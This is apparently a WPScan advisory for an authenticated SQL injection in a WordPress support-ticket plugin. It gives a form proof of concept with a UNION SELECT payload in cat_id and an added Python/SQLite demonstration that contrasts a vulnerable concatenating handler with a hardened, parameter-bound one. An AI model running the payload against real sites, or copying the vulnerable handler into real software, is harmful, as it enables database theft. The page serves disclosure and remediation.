WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection

Description
User access required: any user.

$_POST['cat_id'] is not escaped and is accessible to any user.

Proof of Concept
<form action="http://www.example.com/wp-admin/admin-ajax.php" method="post">
    <input type="text" name="action" value="wpsp_getCatName">
    <input type="text" name="cat_id" value="0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 FROM wp_terms WHERE term_id=1">
    <input type="submit" name="">
</form>
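
Added example (not from the advisory or the plugin's code): a self-contained SQLite stand-in showing why the cat_id value above succeeds when a numeric parameter is concatenated into a query, and how integer validation plus parameter binding stops it. The `ticket_category` table and both handler functions are hypothetical, since the plugin's real schema and code are not on this page; the equivalent WordPress controls are `absint()` and `$wpdb->prepare()` with a `%d` placeholder.

```python
import sqlite3

def make_db():
    """Build a constructed in-memory database standing in for the WordPress one."""
    db = sqlite3.connect(":memory:")
    # MySQL's CONCAT() is registered so the page's payload runs verbatim on SQLite.
    db.create_function("CONCAT", -1, lambda *a: "".join(str(x) for x in a))
    db.executescript("""
        CREATE TABLE wp_terms (term_id INTEGER, name TEXT, slug TEXT);
        INSERT INTO wp_terms VALUES (1, 'Uncategorized', 'uncategorized');
        -- hypothetical three-column category table (assumption, not the plugin's schema)
        CREATE TABLE ticket_category (id INTEGER, name TEXT, parent INTEGER);
        INSERT INTO ticket_category VALUES (1, 'General', 0);
    """)
    return db

def get_cat_name_vulnerable(db, cat_id):
    """cat_id is concatenated into the statement, as the advisory describes."""
    sql = "SELECT id, name, parent FROM ticket_category WHERE id=" + cat_id
    row = db.execute(sql).fetchone()
    return row[1] if row else None

def get_cat_name_hardened(db, cat_id):
    """Accept only a plain decimal integer, then bind it as a parameter."""
    if not (cat_id.isascii() and cat_id.isdigit()):
        return None  # reject anything that is not a non-negative integer
    row = db.execute(
        "SELECT id, name, parent FROM ticket_category WHERE id=?", (int(cat_id),)
    ).fetchone()
    return row[1] if row else None

# The cat_id value from the proof of concept above.
POC = ("0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 "
       "FROM wp_terms WHERE term_id=1")

if __name__ == "__main__":
    db = make_db()
    for handler in (get_cat_name_vulnerable, get_cat_name_hardened):
        print(handler.__name__, repr(handler(db, "1")), repr(handler(db, POC)))
```

The payload contains no quote characters, so quote escaping alone would not have helped here; the value has to be forced to an integer or bound as one.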

Affects

Plugin wp-support-plus-responsive-ticket-system
Fixed in version 8.0.0

References

EXPLOITDB 40939
URL http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
URL https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 140
Verified No
WPVDB ID 8699

Timeline

Publicly Published 2016-12-12 (5 months ago)
Added 2016-12-18 (4 months ago)
Last Updated 2017-03-23 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes; however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license, please contact us.